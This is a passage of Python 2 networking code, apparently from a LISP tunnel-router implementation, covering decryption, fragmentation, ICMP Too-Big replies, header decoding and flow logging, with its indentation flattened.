icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
            # This is the 4-tuple NAT case. There may be another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
        # Call the AES or chacha cipher. For AES-CBC, make sure the
        # ciphertext is a multiple of 16 bytes.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
        # Log the decrypt result and return the plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
        # Keep the outer header, UDP header, and LISP header in self.packet.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
        # Break up the packet payload into fragments and put them in an array
        # so the IP header can be added in the next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
        # Now fix the outer IPv4 header with fragment-offset and total-length
        # values and prepend it to each fragment.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
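    #
    # Worked example of the offset arithmetic above (sizes assumed): a
    # 2400-byte inner payload yields fragments of 1000, 1000 and 400 bytes.
    # offset advances by len(frag)/8 IP fragment units, so the three headers
    # carry frag-offset values 0x2000+0, 0x2000+125 and 250, where 0x2000 is
    # the more-fragments bit, set on all but the last fragment.
    #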
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. We need to build the total-length field just
# like lisp_packet.encode(), checksum, and then fix the outer header.
# That logic is semantically replicated here. The same logic is in
# lisp_packet.fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
#enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order, so they have to be byte-swapped here. But when
# testing, we (UPC guys) discovered the frag-offset field did not need
# swapping. The conclusion is that byte-swapping is necessary on MacOS
# but not on Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
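#
# Illustrative sketch (not called anywhere): the byte-swaps done in
# fix_outer_header() above. On MacOS, IP_HDRINCL raw sockets expect
# the IPv4 total-length (bytes 2-3) and frag-offset (bytes 6-7) fields
# in host byte order, so the two bytes of each field are swapped.
#
def lisp_example_swap_len_and_frag(ip_header):
swapped = ip_header[0:2] + ip_header[3] + ip_header[2] + \
ip_header[4:6] + ip_header[7] + ip_header[6] + ip_header[8::]
return(swapped)
#enddef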
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
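#
# Illustrative sketch (not called anywhere): the checks done in
# is_lisp_packet() above on a raw IPv4 frame. The protocol byte at
# offset 9 must be UDP (17), and either UDP port, at offsets 20-22 and
# 22-24, must be the LISP data port 4341.
#
def lisp_example_is_lisp_data(ipv4_packet):
import struct, socket
if (struct.unpack("B", ipv4_packet[9])[0] != 17): return(False)
sport = socket.ntohs(struct.unpack("H", ipv4_packet[20:22])[0])
dport = socket.ntohs(struct.unpack("H", ipv4_packet[22:24])[0])
return(sport == 4341 or dport == 4341)
#enddef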
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Fragment if the MF bit is set or the fragment-offset is non-zero.
# Mask off the DF bit so unfragmented packets with DF set are not
# misclassified as fragments.
#
self.inner_is_fragment = (frag_field & 0x2000 or
(frag_field & 0x1fff) != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
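#
# Illustrative sketch (not called anywhere): how hash_packet() above
# folds a hash of the inner addresses and ports into the outer UDP
# source port. The result always lands in the range 0xf000-0xffff so
# encapsulated flows get per-flow ECMP/LAG entropy from the source
# port.
#
def lisp_example_fold_to_source_port(hashval):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
return(0xf000 | (hashval & 0xfff))
#enddef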
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
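#
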